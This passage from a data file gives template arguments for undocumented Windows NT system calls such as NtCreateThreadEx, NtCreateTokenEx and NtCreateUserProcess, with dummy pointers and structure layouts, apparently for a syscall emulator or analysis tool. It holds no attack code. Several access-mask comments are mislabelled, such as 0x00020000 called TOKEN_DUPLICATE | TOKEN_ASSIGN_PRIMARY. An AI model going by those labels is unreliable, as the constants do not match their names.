"OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (unnamed event)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtCreateCrossVmMutant": { "ntFunc": "NtCreateCrossVmMutant", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to GUID (dummy pointer, typically None unless cross-VM mutant is named)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Unknown parameter, typically None", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Unknown ULONG parameter, typically 0", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer, often None for unnamed mutant)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct89", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F0001", "additionalComment": "DesiredAccess (MUTANT_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to HANDLE MutantHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct89": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (unnamed mutant)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtCreateDirectoryObjectEx": { "ntFunc": "NtCreateDirectoryObjectEx", "pushes": [ { "value": "0x00000000", "additionalComment": "Flags (typically 0 for default behavior)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ShadowDirectoryHandle (typically None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer, usually required for named directory)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct90", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x000F000F", "additionalComment": "DesiredAccess (DIRECTORY_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to HANDLE DirectoryHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct90": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd00e0", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer for directory name)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtCreateIRTimer": { "ntFunc": "NtCreateIRTimer", "pushes": [ { "value": "0x00100000", "additionalComment": "DesiredAccess (TIMER_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to HANDLE TimerHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtCreateLowBoxToken": { "ntFunc": "NtCreateLowBoxToken", "pushes": [ { "value": "0xbadd0090", "additionalComment": "Pointer to LowBoxStruct (dummy pointer, typically a structure describing the lowbox)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "LowBoxCount (number of entries in LowBoxStruct, typically 1)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00a0", "additionalComment": "Pointer to SID_AND_ATTRIBUTES Capabilities (dummy pointer, typically None if no capabilities)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "CapabilityCount (typically 0 if Capabilities is None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00b0", "additionalComment": "Pointer to SID AppContainerSid (dummy pointer, typically None if not using AppContainer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00c0", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer, often None for default token)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct91", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x00020000", "additionalComment": "DesiredAccess (TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE hOrgToken (dummy handle, typically a real token handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00d0", "additionalComment": "Pointer to HANDLE LowBoxToken (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct91": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (unnamed token)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtCreateRegistryTransaction": { "ntFunc": "NtCreateRegistryTransaction", "pushes": [ { "value": "0x00000000", "additionalComment": "Flags (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (None, defaulted)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x000F003F", "additionalComment": "DesiredAccess (KEY_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to HANDLE RegistryHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtCreateThreadEx": { "ntFunc": "NtCreateThreadEx", "pushes": [ { "value": "0x00000000", "additionalComment": "PVOID AttributeList (None, defaulted)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00200000", "additionalComment": "MaximumStackSize (2MB typical)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00100000", "additionalComment": "StackSize (1MB typical)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ZeroBits (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000004", "additionalComment": "CreateFlags (THREAD_CREATE_FLAGS_CREATE_SUSPENDED)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID Argument (None, defaulted)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00401000", "additionalComment": "PVOID StartRoutine (entry point address)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (None, defaulted)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F03FF", "additionalComment": "DesiredAccess (THREAD_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to HANDLE ThreadHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtCreateTimer2": { "ntFunc": "NtCreateTimer2", "pushes": [ { "value": "0x0010001F", "additionalComment": "DesiredAccess (TIMER_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Attributes (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (None, defaulted)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID Unknown1 (None, defaulted)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to HANDLE TimerHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtCreateTokenEx": { "ntFunc": "NtCreateTokenEx", "pushes": [ { "value": "0x00000000", "additionalComment": "PTOKEN_SOURCE TokenSource (None, defaulted)", "structurePointer": "TOKEN_SOURCE", "structureRef": None, "structureValueExpectations": "SourceName and SourceIdentifier fields.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PTOKEN_DEFAULT_DACL DefaultDacl (None, defaulted)", "structurePointer": "TOKEN_DEFAULT_DACL", "structureRef": None, "structureValueExpectations": "Default discretionary ACL for the token.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PTOKEN_PRIMARY_GROUP PrimaryGroup (None, defaulted)", "structurePointer": "TOKEN_PRIMARY_GROUP", "structureRef": None, "structureValueExpectations": "Primary group SID.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PTOKEN_OWNER Owner (None, defaulted)", "structurePointer": "TOKEN_OWNER", "structureRef": None, "structureValueExpectations": "Owner SID.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PTOKEN_MANDATORY_POLICY TokenMandatoryPolicy (None, defaulted)", "structurePointer": "TOKEN_MANDATORY_POLICY", "structureRef": None, "structureValueExpectations": "Mandatory policy settings.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PTOKEN_GROUPS DeviceGroups (None, defaulted)", "structurePointer": "TOKEN_GROUPS", "structureRef": None, "structureValueExpectations": "Device group SIDs.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PTOKEN_SECURITY_ATTRIBUTES_INFORMATION DeviceAttributes (None, defaulted)", "structurePointer": "TOKEN_SECURITY_ATTRIBUTES_INFORMATION", "structureRef": None, "structureValueExpectations": "Device security attributes.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PTOKEN_SECURITY_ATTRIBUTES_INFORMATION UserAttributes (None, defaulted)", "structurePointer": "TOKEN_SECURITY_ATTRIBUTES_INFORMATION", "structureRef": None, "structureValueExpectations": "User security attributes.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PTOKEN_PRIVILEGES Privileges (None, defaulted)", "structurePointer": "TOKEN_PRIVILEGES", "structureRef": None, "structureValueExpectations": "Token privileges.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PTOKEN_GROUPS Groups (None, defaulted)", "structurePointer": "TOKEN_GROUPS", "structureRef": None, "structureValueExpectations": "Group SIDs.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PTOKEN_USER User (None, defaulted)", "structurePointer": "TOKEN_USER", "structureRef": None, "structureValueExpectations": "User SID.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PLARGE_INTEGER ExpirationTime (None, defaulted)", "structurePointer": "LARGE_INTEGER", "structureRef": None, "structureValueExpectations": "Expiration time as a 64-bit integer.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PLUID AuthenticationId (None, defaulted)", "structurePointer": "LUID", "structureRef": None, "structureValueExpectations": "Locally unique identifier.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "TokenType (TokenPrimary)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (None, defaulted)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x000F01FF", "additionalComment": "DesiredAccess (TOKEN_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to HANDLE TokenHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtCreateUserProcess": { "ntFunc": "NtCreateUserProcess", "pushes": [ { "value": "0x00000000", "additionalComment": "PVOID AttributeList (None, defaulted)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID CreateInfo (None, defaulted)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PRTL_USER_PROCESS_PARAMETERS ProcessParameters (None, defaulted)", "structurePointer": "RTL_USER_PROCESS_PARAMETERS", "structureRef": None, "structureValueExpectations": "Process parameters structure.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ThreadFlags (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ProcessFlags (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES ThreadObjectAttributes (None, defaulted)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES ProcessObjectAttributes (None, defaulted)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F0FFF", "additionalComment": "ThreadDesiredAccess (THREAD_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x001F0FFF", "additionalComment": "ProcessDesiredAccess (PROCESS_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to HANDLE ThreadHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0050", "additionalComment": "Pointer to HANDLE ProcessHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtCreateWaitablePort": { "ntFunc": "NtCreateWaitablePort", "pushes": [ { "value": "0x00010000", "additionalComment": "ULONG MaxPoolUsage (example: 64KB)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000400", "additionalComment": "ULONG MaxMsgLength (example: 1024 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000040", "additionalComment": "ULONG MaxConnectionInfoLength (example: 64 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (None, defaulted)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Optional: Length, RootDirectory, ObjectName, Attributes, SecurityDescriptor, SecurityQualityOfService.", "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to HANDLE PortHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtCreateWnfStateName": { "ntFunc": "NtCreateWnfStateName", "pushes": [ { "value": "0x00000000", "additionalComment": "PSECURITY_DESCRIPTOR SecurityDescriptor (None, defaulted)", "structurePointer": None, "structureRef": None, "structureValueExpectations": "Optional security descriptor pointer.", "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG MaximumStateSize (example: 4096 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID TypeId (None, defaulted)", "structurePointer": None, "structureRef": None, "structureValueExpectations": "Optional GUID pointer for type.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN PersistData (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "ULONG DataScope (WnfDataScopeSession)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000003", "additionalComment": "ULONG Lifetime (WnfTemporaryStateName)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to C WNF_STATE_NAME StateName (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtDebugContinue": { "ntFunc": "NtDebugContinue", "pushes": [ { "value": "0xC000013A", "additionalComment": "NTSTATUS Status (example: STATUS_CONTROL_C_EXIT)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PCLIENT_ID ClientId (None, defaulted)", "structurePointer": "CLIENT_ID", "structureRef": None, "structureValueExpectations": "Optional pointer to CLIENT_ID structure.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE DebugHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtDeleteBootEntry": { "ntFunc": "NtDeleteBootEntry", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to UNICODE_STRING Name (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct92", "structureValueExpectations": "UNICODE_STRING structure with buffer pointing to boot entry name.", "pointedValue": None } ], "structures": { "struct92": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Length in bytes (16 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0040", "fieldComment": "Maximum buffer size in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0040", "fieldComment": "Pointer to boot entry name string (dummy pointer)" } ] } } }, "NtDeleteDriverEntry": { "ntFunc": "NtDeleteDriverEntry", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to UNICODE_STRING Name (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct93", "structureValueExpectations": "UNICODE_STRING structure with buffer pointing to driver entry name.", "pointedValue": None } ], "structures": { "struct93": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0018", "fieldComment": "Length in bytes (12 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Maximum buffer size in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0050", "fieldComment": "Pointer to driver entry name string (dummy pointer)" } ] } } }, "NtDeleteWnfStateData": { "ntFunc": "NtDeleteWnfStateData", "pushes": [ { "value": "0x00000000", "additionalComment": "ExplicitScope (None, default scope)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xaabbccdd", "additionalComment": "PCWNF_STATE_NAME StateName (example state name value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtDeleteWnfStateName": { "ntFunc": "NtDeleteWnfStateName", "pushes": [ { "value": "0xaabbccdd", "additionalComment": "PCWNF_STATE_NAME StateName (example state name value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtDirectGraphicsCall": { "ntFunc": "NtDirectGraphicsCall", "pushes": [ { "value": "0x00000001", "additionalComment": "ULONG Unknown (example nonzero value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "ULONG Unknown (example nonzero value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000003", "additionalComment": "ULONG Unknown (example nonzero value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000004", "additionalComment": "ULONG Unknown (example nonzero value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000005", "additionalComment": "ULONG Unknown (example nonzero value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtFilterBootOption": { "ntFunc": "NtFilterBootOption", "pushes": [ { "value": "0x00000010", "additionalComment": "ULONG DataSize (example: 16 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "PVOID Data (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xdeadbeef" }, { "value": "0x00000001", "additionalComment": "ULONG ElementType (example: 1, e.g., BootApplication)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "ULONG ObjectType (example: 2, e.g., BootObject)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000003", "additionalComment": "ULONG FilterOperation (example: 3, e.g., FilterDelete)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtFilterToken": { "ntFunc": "NtFilterToken", "pushes": [ { "value": "0xbadd0010", "additionalComment": "PHANDLE NewTokenHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0020", "additionalComment": "PTOKEN_GROUPS RestrictedSids (dummy pointer, typically None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0030", "additionalComment": "PTOKEN_PRIVILEGES PrivilegesToDelete (dummy pointer, typically None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0040", "additionalComment": "PTOKEN_GROUPS SidsToDisable (dummy pointer, typically None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "ULONG Flags (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ExistingTokenHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtFilterTokenEx": { "ntFunc": "NtFilterTokenEx", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to HANDLE NewTokenHandle (dummy pointer, will receive new token handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "RestrictedDeviceGroups (None, no device groups restricted)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "RestrictedDeviceAttributes (None, no device attributes restricted)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "RestrictedUserAttributes (None, no user attributes restricted)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "DeviceGroupsToDisable (None, no device groups to disable)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "DeviceClaimsToDisable (None, no device claims to disable)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "DisableDeviceClaimsCount (0, no device claims to disable)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "UserClaimsToDisable (None, no user claims to disable)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "DisableUserClaimsCount (0, no user claims to disable)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "RestrictedSids (None, no SIDs restricted)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PrivilegesToDelete (None, no privileges to delete)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "SidsToDisable (None, no SIDs to disable)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Flags (0, default behavior)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE TokenHandle (dummy handle to existing token)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtGetCachedSigningLevel": { "ntFunc": "NtGetCachedSigningLevel", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG Flags (dummy pointer, will receive flags)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0020", "additionalComment": "Pointer to ULONG ThumbprintSize (dummy pointer, will receive thumbprint size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000014" }, { "value": "0xbadd0030", "additionalComment": "Pointer to UCHAR Thumbprint (dummy pointer, will receive thumbprint)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xdeadbeef" }, { "value": "0xbadd0040", "additionalComment": "Pointer to BYTE SigningLevel (dummy pointer, will receive signing level)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x06" }, { "value": "0xbadd0050", "additionalComment": "Pointer to ULONG Flags (dummy pointer, will receive flags)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00000888", "additionalComment": "HANDLE File (dummy file handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, 